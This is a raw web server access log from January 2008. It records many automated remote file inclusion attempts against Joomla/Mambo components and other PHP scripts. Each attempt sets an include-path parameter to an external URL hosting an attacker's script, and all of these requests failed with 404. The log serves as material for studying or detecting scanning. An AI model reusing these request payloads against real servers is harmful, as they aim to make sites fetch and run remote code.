62.249.212.252 - - [06/Jan/2008:16:39:55 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
161.58.198.111 - - [06/Jan/2008:16:40:17 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
161.58.198.111 - - [06/Jan/2008:16:40:17 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.198.111 - - [06/Jan/2008:16:40:18 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.249.212.252 - - [06/Jan/2008:16:41:52 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
161.58.198.111 - - [06/Jan/2008:16:41:58 -0800] "GET /logs/access_071001.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.198.111 - - [06/Jan/2008:16:42:10 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.198.111 - - [06/Jan/2008:16:42:10 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:43:22 -0800] "GET /logs/access_071210.log/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:43:22 -0800] "GET /index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:43:23 -0800] "GET /logs/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:43:24 -0800] "GET /logs/access_071210.log/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:43:25 -0800] "GET /index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:43:25 -0800] "GET /logs/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:43:28 -0800] "GET /logs/access_071210.log/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
80.231.1.130 - - [06/Jan/2008:16:43:28 -0800] "GET /index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:43:29 -0800] "GET /logs/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:43:33 -0800] "GET /logs/access_071210.log/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:43:33 -0800] "GET /index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:43:39 -0800] "GET /logs/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.94.98 - - [06/Jan/2008:16:44:24 -0800] "GET /logs/index2.php?url_page=http://www.elycorp.com/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.94.98 - - [06/Jan/2008:16:44:24 -0800] "GET /index2.php?url_page=http://www.elycorp.com/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.200.122 - - [06/Jan/2008:16:44:59 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.fo-clan.de/templates/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
72.232.200.122 - - [06/Jan/2008:16:44:59 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.fo-clan.de/templates/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
217.67.229.2 - - [06/Jan/2008:16:45:24 -0800] "GET /logs//advguestbook/admin.php?include_path=http://www.tokyowww.com/alat/echo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.67.229.2 - - [06/Jan/2008:16:45:24 -0800] "GET //advguestbook/admin.php?include_path=http://www.tokyowww.com/alat/echo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.44.69.194 - - [06/Jan/2008:16:45:57 -0800] "GET /logs/access_070910.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.44.69.194 - - [06/Jan/2008:16:45:57 -0800] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.44.69.194 - - [06/Jan/2008:16:45:57 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.208.99.103 - - [06/Jan/2008:16:47:00 -0800] "GET /logs/access.log/homepage.php?sel=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.208.99.103 - - [06/Jan/2008:16:47:03 -0800] "GET /homepage.php?sel=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.208.99.103 - - [06/Jan/2008:16:47:03 -0800] "GET /logs/homepage.php?sel=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.94.144.249 - - [06/Jan/2008:16:47:04 -0800] "GET //adminfoot.php?path%5Bdocroot%5D=http://www.santacruzlive.com/ui/administrator/components/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.186.169.183 - - [06/Jan/2008:16:47:13 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.169.183 - - [06/Jan/2008:16:47:13 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
70.84.94.98 - - [06/Jan/2008:16:47:16 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.elycorp.com/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:16:49:20 -0800] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.209.81.1 - - [06/Jan/2008:16:50:32 -0800] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.209.81.1 - - [06/Jan/2008:16:50:33 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.209.81.1 - - [06/Jan/2008:16:50:33 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:16:51:15 -0800] "GET /logs/access_071029.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:16:51:17 -0800] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:16:51:18 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.209.81.1 - - [06/Jan/2008:16:51:22 -0800] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:16:51:54 -0800] "GET /logs/access_071210.log/inc/common.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:16:51:54 -0800] "GET /logs/inc/common.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:16:52:05 -0800] "GET /inc/common.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:16:52:15 -0800] "GET /logs/access_070827.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.208.99.103 - - [06/Jan/2008:16:53:52 -0800] "GET /logs/access_070924.log/index1.php?dat=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.98.150.12 - - [06/Jan/2008:16:53:52 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.150.12 - - [06/Jan/2008:16:53:52 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.90.114.126 - - [06/Jan/2008:16:53:53 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.208.99.103 - - [06/Jan/2008:16:53:57 -0800] "GET /index1.php?dat=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
74.208.99.103 - - [06/Jan/2008:16:53:57 -0800] "GET /logs/index1.php?dat=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.208.99.103 - - [06/Jan/2008:16:53:57 -0800] "GET /logs/access_070806.log/index1.php?dat=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.98.150.12 - - [06/Jan/2008:16:54:43 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.98.150.12 - - [06/Jan/2008:16:54:44 -0800] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.144.55.219 - - [06/Jan/2008:16:56:39 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.209.81.1 - - [06/Jan/2008:16:57:04 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.22.173 - - [06/Jan/2008:16:57:27 -0800] "GET /logs/access_070820.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.144.55.219 - - [06/Jan/2008:16:57:36 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.203.208.158 - - [06/Jan/2008:16:57:56 -0800] "GET /logs/index2.php?pag=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.203.208.158 - - [06/Jan/2008:16:57:56 -0800] "GET /index2.php?pag=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.52.216.28 - - [06/Jan/2008:16:58:21 -0800] "GET /logs/access_071105.log/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.52.216.28 - - [06/Jan/2008:16:58:21 -0800] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.52.216.28 - - [06/Jan/2008:16:58:22 -0800] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.52.216.28 - - [06/Jan/2008:16:58:22 -0800] "GET /logs/access_071029.log/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.150.12 - - [06/Jan/2008:16:58:24 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.198.72 - - [06/Jan/2008:16:58:29 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.198.72 - - [06/Jan/2008:16:58:31 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:00:18 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:00:18 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.90.114.126 - - [06/Jan/2008:17:00:19 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.90.114.126 - - [06/Jan/2008:17:00:20 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.90.114.126 - - [06/Jan/2008:17:00:20 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.246.124.110 - - [06/Jan/2008:17:00:24 -0800] "GET /inc/common.load.php?env[include_prefix]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.124.110 - - [06/Jan/2008:17:00:24 -0800] "GET /inc/common.load.php?env[include_prefix]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
202.133.244.36 - - [06/Jan/2008:17:00:56 -0800] "GET //include.php?path[docroot]=http://nexouz.we.bs/apc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.53.227.2 - - [06/Jan/2008:17:01:02 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:02:16 -0800] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.209.81.1 - - [06/Jan/2008:17:02:27 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:02:37 -0800] "GET /logs/access_071028.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:02:38 -0800] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:02:41 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.149.244.41 - - [06/Jan/2008:17:02:47 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h1.ripway.com/mlengse/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.149.244.41 - - [06/Jan/2008:17:02:48 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h1.ripway.com/mlengse/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.149.244.41 - - [06/Jan/2008:17:02:48 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h1.ripway.com/mlengse/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.149.244.41 - - [06/Jan/2008:17:02:48 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h1.ripway.com/mlengse/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.7.198.72 - - [06/Jan/2008:17:02:54 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.7.198.72 - - [06/Jan/2008:17:02:55 -0800] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:03:08 -0800] "GET /logs/access_071022.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:03:10 -0800] "GET /logs/access_071210.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:03:17 -0800] "GET /logs/access_071217.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
69.144.55.219 - - [06/Jan/2008:17:03:24 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:03:33 -0800] "GET /logs/access_071001.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.144.55.219 - - [06/Jan/2008:17:03:54 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.173 - - [06/Jan/2008:17:04:16 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:04:59 -0800] "GET /logs/access_071112.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.230.148.86 - - [06/Jan/2008:17:05:04 -0800] "GET /logs/access_071210.log/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.230.148.86 - - [06/Jan/2008:17:05:05 -0800] "GET /index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.230.148.86 - - [06/Jan/2008:17:05:05 -0800] "GET /logs/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:05:17 -0800] "GET /logs/access_071029.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.15.129.105 - - [06/Jan/2008:17:05:19 -0800] "GET /logs/access_071217.log//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.15.129.105 - - [06/Jan/2008:17:05:20 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.15.129.105 - - [06/Jan/2008:17:05:20 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:17:05:44 -0800] "GET /logs/access_071210.log/inc/common.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:17:05:45 -0800] "GET /inc/common.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:17:05:45 -0800] "GET /logs/inc/common.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:17:06:17 -0800] "GET /inc/dbase.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.203.208.158 - - [06/Jan/2008:17:06:27 -0800] "GET /logs/access_071008.log/index2.php?pag=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.28.106.195 - - [06/Jan/2008:17:06:38 -0800] "GET /logs/access.log/index.php?u=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.28.106.195 - - [06/Jan/2008:17:06:42 -0800] "GET /index.php?u=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.28.106.195 - - [06/Jan/2008:17:06:43 -0800] "GET /logs/index.php?u=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
161.58.198.111 - - [06/Jan/2008:17:06:56 -0800] "GET /logs/access_070730.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.198.111 - - [06/Jan/2008:17:06:56 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.198.111 - - [06/Jan/2008:17:06:56 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.209.81.1 - - [06/Jan/2008:17:07:31 -0800] "GET /logs/access_070924.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:07:32 -0800] "GET /logs/access_070924.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.209.81.1 - - [06/Jan/2008:17:07:33 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.209.81.1 - - [06/Jan/2008:17:07:33 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.230.148.86 - - [06/Jan/2008:17:07:36 -0800] "GET /logs/access_071008.log/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.230.148.86 - - [06/Jan/2008:17:07:36 -0800] "GET /index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
211.230.148.86 - - [06/Jan/2008:17:07:40 -0800] "GET /logs/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.209.81.1 - - [06/Jan/2008:17:07:45 -0800] "GET /logs/access_071022.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
